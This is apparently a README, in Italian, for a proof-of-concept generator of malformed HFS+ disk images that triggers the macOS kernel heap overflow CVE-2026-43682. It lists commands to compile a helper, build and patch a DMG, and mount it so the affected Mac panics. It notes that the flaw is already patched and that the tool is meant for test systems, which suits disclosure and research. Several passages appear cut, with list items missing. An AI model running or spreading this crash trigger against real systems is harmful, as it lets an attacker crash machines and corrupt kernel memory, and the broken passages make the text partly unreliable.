
Generatore proof-of-concept di immagini disco che crea una chiave B-tree degli attributi HFS+ malformata per attivare l'overflow dell'heap del kernel CVE-2026-43682 su macOS.
Questa proof of concept dovrebbe causare un kernel panic e riavviare un Mac interessato. Usala solo su un sistema di test usa e getta. La cattura delle prove ha utilizzato Apple silicon con macOS Tahoe 26.3 (25D125). Apple ha corretto CVE-2026-43682 in Tahoe 26.6, Sequoia 15.7.8 e Sonoma 14.8.8.
La PoC è un generatore di immagini disco, non un exploit di privilege escalation. Essa:
_COMM_PAGE_ASB_TARGET_KERN_VALUE del boot corrente su Apple silicon;La copia malformata è deterministica. Non lo è invece se Probabilistic GZAlloc collochi una guardia dove la sovrascrittura genera immediatamente un fault.
hdiutil e xattr.Non sono richiesti pacchetti Python di terze parti.
L'helper è opzionale, ma rende esplicito il valore per-boot prima che l'immagine venga generata:
cd poc
clang -O2 -Wall -Wextra check_commpage.c -o check_commpage
./check_commpage
Crea l'immagine di base e applica una patch al suo albero degli attributi:
./create_base_dmg.sh base_with_attrs.dmg
python3 craft_attr_poc_asb.py \
base_with_attrs.dmg \
cve-2026-43682.dmg \
2884
Lo script Python stampa il valore kernel Target Flag dello stesso boot e il pattern scritto nell'immagine.
Collegare o successivamente indicizzare l'immagine può essere sufficiente per raggiungere il percorso vulnerabile degli attributi. Il trigger esplicito usato durante i test era:
hdiutil attach -readonly -nobrowse cve-2026-43682.dmg
ls -l@ /Volumes/AttrPOC/
Su un sistema vulnerabile, il risultato atteso è un kernel data abort durante la copia della chiave B-tree sovradimensionata. Su un sistema corretto, la chiave malformata dovrebbe essere rifiutata senza corruzione della memoria del kernel.
Dopo un'esecuzione senza crash, scollega il volume di test con:
hdiutil detach /Volumes/AttrPOC